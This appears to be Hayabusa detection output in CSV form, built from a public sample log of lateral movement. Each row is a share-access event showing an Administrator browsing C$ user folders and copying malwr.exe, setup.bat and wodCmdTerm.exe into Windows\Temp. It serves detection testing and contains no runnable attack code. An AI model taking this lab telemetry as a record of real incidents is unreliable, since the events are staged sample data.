2019-03-18 23:23:25.629 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Saved Games\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.639 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Searches\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.639 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Videos\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.639 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Contacts : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.639 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Desktop : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.639 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Documents : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.639 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Downloads : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.649 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Favorites : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.649 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Favorites\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.649 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Favorites\Links for United States\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.649 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Favorites\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.649 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Favorites\Links for United States : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Music : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Pictures : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Saved Games : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Searches : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Videos : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.669 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Contacts\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.669 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Desktop\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.669 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Documents\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.669 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Downloads\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.669 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Favorites\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.679 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.679 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Music\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.679 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.679 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Saved Games\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.679 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Searches\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.679 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Videos\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.689 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Contacts : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.689 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Desktop : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.689 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Documents : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.689 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Downloads : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.689 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Favorites : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.689 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Favorites\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.699 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Favorites\Links for United States\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.699 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Favorites\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.699 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Favorites\Links for United States : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.709 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.709 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Music : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.709 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Pictures : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.709 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Saved Games : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.709 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Searches : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.709 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Videos : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:26.981 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: malwr.exe : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:26.981 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: malwr.exe : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:27.061 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: malwr.exe : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:27.071 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: malwr.exe : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:27.081 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: ui\SwDRM.dll : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:27.081 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: malwr.exe : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:45.488 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:45.548 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:45.548 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Default\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:47.721 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:47.721 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:56.403 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:56.414 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\AppData : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:58.386 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:24:04.105 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:24:04.115 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:24:04.115 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Fonts\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:24:04.115 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Media\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:24:07.249 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:24:07.249 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:24:07.529 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:24:07.630 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:24:07.700 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:24:09.913 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp\setup.bat : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:24:09.913 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp\setup.bat : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:24:09.923 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:24:09.933 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:24:10.053 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp\wodCmdTerm.exe : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:24:10.053 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:24:10.053 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp\wodCmdTerm.exe : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
